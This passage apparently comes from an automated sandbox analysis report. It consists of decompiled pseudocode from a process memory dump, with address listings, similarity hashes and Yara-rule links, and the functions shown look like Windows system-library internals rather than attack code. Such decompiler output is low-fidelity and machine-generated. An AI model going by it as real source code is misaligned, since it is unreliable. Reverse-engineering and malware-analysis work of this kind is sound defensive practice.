										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                          0x00a8e547
                                                                                                                          0x00a8e549
                                                                                                                          0x00a8e54f
                                                                                                                          0x00a8e553
                                                                                                                          0x00a8e557
                                                                                                                          0x00a8e55a
                                                                                                                          0x00a8e55c
                                                                                                                          0x00a8e55f
                                                                                                                          0x00a8e561
                                                                                                                          0x00a8e567
                                                                                                                          0x00a8e56b
                                                                                                                          0x00a8e7e2
                                                                                                                          0x00000000
                                                                                                                          0x00a8e571
                                                                                                                          0x00a8e575
                                                                                                                          0x00a8e577
                                                                                                                          0x00a8e57b
                                                                                                                          0x00a8e57c
                                                                                                                          0x00a8e57d
                                                                                                                          0x00a8e57e
                                                                                                                          0x00a8e57f
                                                                                                                          0x00a8e588
                                                                                                                          0x00a8e58f
                                                                                                                          0x00a8e591
                                                                                                                          0x00a8e592
                                                                                                                          0x00a8e592
                                                                                                                          0x00a8e596
                                                                                                                          0x00a8e59e
                                                                                                                          0x00a8e5a0
                                                                                                                          0x00a8e5a6
                                                                                                                          0x00a8e61d
                                                                                                                          0x00a8e61d
                                                                                                                          0x00a8e621
                                                                                                                          0x00a8e623
                                                                                                                          0x00a8e630
                                                                                                                          0x00a8e630
                                                                                                                          0x00a8e7e6
                                                                                                                          0x00a8e7eb
                                                                                                                          0x00a8e7ed
                                                                                                                          0x00a8e7f4
                                                                                                                          0x00a8e7fa
                                                                                                                          0x00a8e7ff
                                                                                                                          0x00a8e7ff
                                                                                                                          0x00a8e80a
                                                                                                                          0x00a8e812
                                                                                                                          0x00a8e812
                                                                                                                          0x00a8e5ab
                                                                                                                          0x00a8e5b4
                                                                                                                          0x00a8e5b9
                                                                                                                          0x00a8e5be
                                                                                                                          0x00a8e5c0
                                                                                                                          0x00a8e5c2
                                                                                                                          0x00a8e5c8
                                                                                                                          0x00a8e5c9
                                                                                                                          0x00a8e5cb
                                                                                                                          0x00a8e5cc
                                                                                                                          0x00a8e5d5
                                                                                                                          0x00a8e5e4
                                                                                                                          0x00a8e5f1
                                                                                                                          0x00a8e5f8
                                                                                                                          0x00a8e5f8
                                                                                                                          0x00a8e5d5
                                                                                                                          0x00a8e602
                                                                                                                          0x00a8e616
                                                                                                                          0x00a8e63d
                                                                                                                          0x00a8e644
                                                                                                                          0x00a8e64d
                                                                                                                          0x00a8e652
                                                                                                                          0x00a8e657
                                                                                                                          0x00a8e659
                                                                                                                          0x00a8e65b
                                                                                                                          0x00a8e661
                                                                                                                          0x00a8e662
                                                                                                                          0x00a8e664
                                                                                                                          0x00a8e665
                                                                                                                          0x00a8e66e
                                                                                                                          0x00a8e67d
                                                                                                                          0x00a8e68a
                                                                                                                          0x00a8e691
                                                                                                                          0x00a8e691
                                                                                                                          0x00a8e66e
                                                                                                                          0x00a8e6b0
                                                                                                                          0x00000000
                                                                                                                          0x00a8e6b6
                                                                                                                          0x00a8e6bd
                                                                                                                          0x00a8e6c7
                                                                                                                          0x00a8e6d7
                                                                                                                          0x00a8e6d9
                                                                                                                          0x00a8e6db
                                                                                                                          0x00a8e6de
                                                                                                                          0x00a8e6e3
                                                                                                                          0x00a8e6f3
                                                                                                                          0x00a8e6fc
                                                                                                                          0x00a8e700
                                                                                                                          0x00a8e700
                                                                                                                          0x00a8e704
                                                                                                                          0x00a8e70a
                                                                                                                          0x00a8e70a
                                                                                                                          0x00a8e713
                                                                                                                          0x00a8e716
                                                                                                                          0x00a8e719
                                                                                                                          0x00a8e720
                                                                                                                          0x00a8e761
                                                                                                                          0x00a8e76b
                                                                                                                          0x00a8e774
                                                                                                                          0x00a8e77a
                                                                                                                          0x00a8e77a
                                                                                                                          0x00a8e78a
                                                                                                                          0x00a8e791
                                                                                                                          0x00a8e799
                                                                                                                          0x00a8e79b
                                                                                                                          0x00a8e79f
                                                                                                                          0x00a8e7aa
                                                                                                                          0x00a8e7c0
                                                                                                                          0x00a8e7ac
                                                                                                                          0x00a8e7b2
                                                                                                                          0x00a8e7b9
                                                                                                                          0x00a8e7b9
                                                                                                                          0x00a8e7c7
                                                                                                                          0x00a8e806
                                                                                                                          0x00000000
                                                                                                                          0x00a8e7c9
                                                                                                                          0x00a8e7d1
                                                                                                                          0x00a8e7d8
                                                                                                                          0x00000000
                                                                                                                          0x00a8e7d8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e722
                                                                                                                          0x00a8e72e
                                                                                                                          0x00a8e748
                                                                                                                          0x00a8e74c
                                                                                                                          0x00a8e754
                                                                                                                          0x00a8e756
                                                                                                                          0x00a8e75c
                                                                                                                          0x00a8e75c
                                                                                                                          0x00000000
                                                                                                                          0x00a8e75c
                                                                                                                          0x00a8e758
                                                                                                                          0x00a8e758
                                                                                                                          0x00000000
                                                                                                                          0x00a8e758
                                                                                                                          0x00a8e750
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e752
                                                                                                                          0x00000000
                                                                                                                          0x00a8e752
                                                                                                                          0x00a8e730
                                                                                                                          0x00a8e735
                                                                                                                          0x00a8e73d
                                                                                                                          0x00a8e73f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e741
                                                                                                                          0x00a8e741
                                                                                                                          0x00000000
                                                                                                                          0x00a8e741
                                                                                                                          0x00a8e739
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e73b
                                                                                                                          0x00000000
                                                                                                                          0x00a8e73b
                                                                                                                          0x00a8e722
                                                                                                                          0x00a8e720
                                                                                                                          0x00a8e6b0
                                                                                                                          0x00a8e618
                                                                                                                          0x00000000
                                                                                                                          0x00a8e618

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `$`
                                                                                                                          • API String ID: 0-197956300
                                                                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction ID: 74349b0bb12f43b90ba9dc29e5c63bb081345a564999f327facfc664ff5f0de0
                                                                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction Fuzzy Hash: 77917D316043429FE724EF25C941B1BB7E6BF84714F18892DF9A9CB291E774E904CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00A451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xaa05f0);
				E00A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E009DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00A453CA(0);
						return E00A1D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00A0F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E009E3690(1, _t117, 0x9a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00A0AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L009E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00A0AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00A4500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00A09860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                          0x00a451be
                                                                                                                          0x00a451c3
                                                                                                                          0x00a451c8
                                                                                                                          0x00a451cd
                                                                                                                          0x00a451d0
                                                                                                                          0x00a451d3
                                                                                                                          0x00a451d8
                                                                                                                          0x00a451db
                                                                                                                          0x00a451de
                                                                                                                          0x00a451e0
                                                                                                                          0x00a451e3
                                                                                                                          0x00a451e6
                                                                                                                          0x00a451e8
                                                                                                                          0x00a45342
                                                                                                                          0x00a45351
                                                                                                                          0x00a45356
                                                                                                                          0x00a4535a
                                                                                                                          0x00a45360
                                                                                                                          0x00a45363
                                                                                                                          0x00a45366
                                                                                                                          0x00a45369
                                                                                                                          0x00a45369
                                                                                                                          0x00a4536b
                                                                                                                          0x00a4536b
                                                                                                                          0x00a45370
                                                                                                                          0x00a453a3
                                                                                                                          0x00a453a4
                                                                                                                          0x00a453a6
                                                                                                                          0x00a453ab
                                                                                                                          0x00a453ab
                                                                                                                          0x00a453ae
                                                                                                                          0x00a453ae
                                                                                                                          0x00a453b5
                                                                                                                          0x00a453bf
                                                                                                                          0x00a453bf
                                                                                                                          0x00a45375
                                                                                                                          0x00a45396
                                                                                                                          0x00a453a0
                                                                                                                          0x00a453a0
                                                                                                                          0x00000000
                                                                                                                          0x00a45396
                                                                                                                          0x00a45377
                                                                                                                          0x00a45379
                                                                                                                          0x00a4537f
                                                                                                                          0x00a4538c
                                                                                                                          0x00a45390
                                                                                                                          0x00000000
                                                                                                                          0x00a45390
                                                                                                                          0x00a451ee
                                                                                                                          0x00a451f1
                                                                                                                          0x00a45301
                                                                                                                          0x00a45310
                                                                                                                          0x00a45315
                                                                                                                          0x00a45318
                                                                                                                          0x00a4531b
                                                                                                                          0x00a45320
                                                                                                                          0x00a4532e
                                                                                                                          0x00a45331
                                                                                                                          0x00000000
                                                                                                                          0x00a45331
                                                                                                                          0x00a45328
                                                                                                                          0x00a45329
                                                                                                                          0x00000000
                                                                                                                          0x00a45329
                                                                                                                          0x00a451fa
                                                                                                                          0x00a45235
                                                                                                                          0x00a45236
                                                                                                                          0x00a45239
                                                                                                                          0x00a4523f
                                                                                                                          0x00a45240
                                                                                                                          0x00a45241
                                                                                                                          0x00a45242
                                                                                                                          0x00a45246
                                                                                                                          0x00a45247
                                                                                                                          0x00a4524e
                                                                                                                          0x00a45251
                                                                                                                          0x00a45267
                                                                                                                          0x00a45269
                                                                                                                          0x00a4526e
                                                                                                                          0x00a4527d
                                                                                                                          0x00a4527e
                                                                                                                          0x00a45281
                                                                                                                          0x00a45282
                                                                                                                          0x00a45287
                                                                                                                          0x00a45288
                                                                                                                          0x00a4528a
                                                                                                                          0x00a4528f
                                                                                                                          0x00a45294
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a4529a
                                                                                                                          0x00a4529c
                                                                                                                          0x00a4529e
                                                                                                                          0x00a4529e
                                                                                                                          0x00a452a4
                                                                                                                          0x00a452b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a452ba
                                                                                                                          0x00a452bc
                                                                                                                          0x00a452bc
                                                                                                                          0x00a452d4
                                                                                                                          0x00a452d9
                                                                                                                          0x00a452dc
                                                                                                                          0x00a452e1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a452e7
                                                                                                                          0x00a452f4
                                                                                                                          0x00000000
                                                                                                                          0x00a452f4
                                                                                                                          0x00a45270
                                                                                                                          0x00000000
                                                                                                                          0x00a45270
                                                                                                                          0x00a451fc
                                                                                                                          0x00a451fd
                                                                                                                          0x00a45202
                                                                                                                          0x00a45203
                                                                                                                          0x00a45205
                                                                                                                          0x00a4520a
                                                                                                                          0x00a4520f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a4521b
                                                                                                                          0x00a45226
                                                                                                                          0x00a4522b
                                                                                                                          0x00a4521d
                                                                                                                          0x00a4521d
                                                                                                                          0x00a45222
                                                                                                                          0x00a45222
                                                                                                                          0x00a4522d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                          • Opcode ID: 77a0f275fc61e98a8b37cb905e65bf473017a22536e81883b4a6053a84205d1d
                                                                                                                          • Instruction ID: 86cba4fab4fa4f2eca10c384e0653208618fd9b815786c4e53106a7c4b56f90e
                                                                                                                          • Opcode Fuzzy Hash: 77a0f275fc61e98a8b37cb905e65bf473017a22536e81883b4a6053a84205d1d
                                                                                                                          • Instruction Fuzzy Hash: A0515DB5E00A189FDB24DFA8C950AAEB7F8BF88740F14406DE549EB292D671ED40CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E009EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xabd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E009E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00A98CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00A09E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00A0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00A0CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E009E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00A98F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00A0AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xab8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xab862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xab8628; // 0x0
							_t116 =  *0xab862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                          0x009eb94c
                                                                                                                          0x009eb956
                                                                                                                          0x009eb95c
                                                                                                                          0x009eb95e
                                                                                                                          0x009eb964
                                                                                                                          0x009eb969
                                                                                                                          0x009eb96d
                                                                                                                          0x009eb96d
                                                                                                                          0x009eb970
                                                                                                                          0x009eb974
                                                                                                                          0x009eb97a
                                                                                                                          0x009ebadf
                                                                                                                          0x009ebadf
                                                                                                                          0x009ebae2
                                                                                                                          0x009ebae4
                                                                                                                          0x009ebae6
                                                                                                                          0x009ebaf0
                                                                                                                          0x00a32cb8
                                                                                                                          0x009ebaf6
                                                                                                                          0x009ebaf6
                                                                                                                          0x009ebaf6
                                                                                                                          0x009ebafd
                                                                                                                          0x009ebb1f
                                                                                                                          0x009ebb1f
                                                                                                                          0x009ebaff
                                                                                                                          0x009ebb00
                                                                                                                          0x009ebb00
                                                                                                                          0x009ebb03
                                                                                                                          0x009ebb03
                                                                                                                          0x009ebacb
                                                                                                                          0x009ebacf
                                                                                                                          0x009ebad0
                                                                                                                          0x009ebad1
                                                                                                                          0x009ebadc
                                                                                                                          0x009ebadc
                                                                                                                          0x009eb980
                                                                                                                          0x009eb980
                                                                                                                          0x009eb988
                                                                                                                          0x009eb98b
                                                                                                                          0x009eb98d
                                                                                                                          0x009eb990
                                                                                                                          0x009eb993
                                                                                                                          0x009eb999
                                                                                                                          0x009eb99b
                                                                                                                          0x009eb9a1
                                                                                                                          0x009eb9a5
                                                                                                                          0x009eb9aa
                                                                                                                          0x009eb9b0
                                                                                                                          0x009eb9bb
                                                                                                                          0x009eb9c0
                                                                                                                          0x009eb9c3
                                                                                                                          0x009eb9ca
                                                                                                                          0x009eb9cc
                                                                                                                          0x009eb9cf
                                                                                                                          0x009eb9d3
                                                                                                                          0x009eb9d7
                                                                                                                          0x009eba94
                                                                                                                          0x009eba94
                                                                                                                          0x009eba98
                                                                                                                          0x009ebaa3
                                                                                                                          0x00a32ccb
                                                                                                                          0x009ebaa9
                                                                                                                          0x009ebaa9
                                                                                                                          0x009ebaa9
                                                                                                                          0x009ebab1
                                                                                                                          0x00a32cd5
                                                                                                                          0x00a32cdd
                                                                                                                          0x00a32cdd
                                                                                                                          0x009ebabb
                                                                                                                          0x009ebabc
                                                                                                                          0x009ebac2
                                                                                                                          0x009ebac3
                                                                                                                          0x009ebac3
                                                                                                                          0x009ebac6
                                                                                                                          0x00000000
                                                                                                                          0x009eb9dd
                                                                                                                          0x009eb9dd
                                                                                                                          0x009eb9e7
                                                                                                                          0x009eb9e7
                                                                                                                          0x009eb9ec
                                                                                                                          0x009eb9ec
                                                                                                                          0x009eb9f1
                                                                                                                          0x009eb9f5
                                                                                                                          0x009eb9fa
                                                                                                                          0x009eba00
                                                                                                                          0x009eba0c
                                                                                                                          0x009eba10
                                                                                                                          0x009eba10
                                                                                                                          0x009eba12
                                                                                                                          0x009eba18
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ebb26
                                                                                                                          0x009ebb26
                                                                                                                          0x009eba1e
                                                                                                                          0x009eba1e
                                                                                                                          0x009eba23
                                                                                                                          0x009eba25
                                                                                                                          0x009eba2c
                                                                                                                          0x009eba30
                                                                                                                          0x009eba35
                                                                                                                          0x009eba35
                                                                                                                          0x009eba41
                                                                                                                          0x009eba46
                                                                                                                          0x009eba4c
                                                                                                                          0x009eba50
                                                                                                                          0x009eba54
                                                                                                                          0x009eba6a
                                                                                                                          0x009eba6e
                                                                                                                          0x009eba70
                                                                                                                          0x009eba74
                                                                                                                          0x009eba78
                                                                                                                          0x009eba7a
                                                                                                                          0x009eba7c
                                                                                                                          0x009eba8e
                                                                                                                          0x009eba90
                                                                                                                          0x009eba92
                                                                                                                          0x009ebb14
                                                                                                                          0x009ebb14
                                                                                                                          0x009ebb16
                                                                                                                          0x009ebb16
                                                                                                                          0x00000000
                                                                                                                          0x009eba7c
                                                                                                                          0x009ebb0a
                                                                                                                          0x009ebb0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ebb0f

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009EB9A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 885266447-0
                                                                                                                          • Opcode ID: 7e5e363ad738af08df6578297829bac147740878bd2b8791d9508bae377e9fd7
                                                                                                                          • Instruction ID: 6a77a11489a0af7b067f6369926d588135c9cb431415d15c90fb70938a81ef2d
                                                                                                                          • Opcode Fuzzy Hash: 7e5e363ad738af08df6578297829bac147740878bd2b8791d9508bae377e9fd7
                                                                                                                          • Instruction Fuzzy Hash: 81514971608381CFCB21CF6AC580A2BBBE9BB88714F24496EF68597355D734EC44CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009CB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E009CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xa9f7a8);
				E00A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00A1D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00A0D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00A0F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
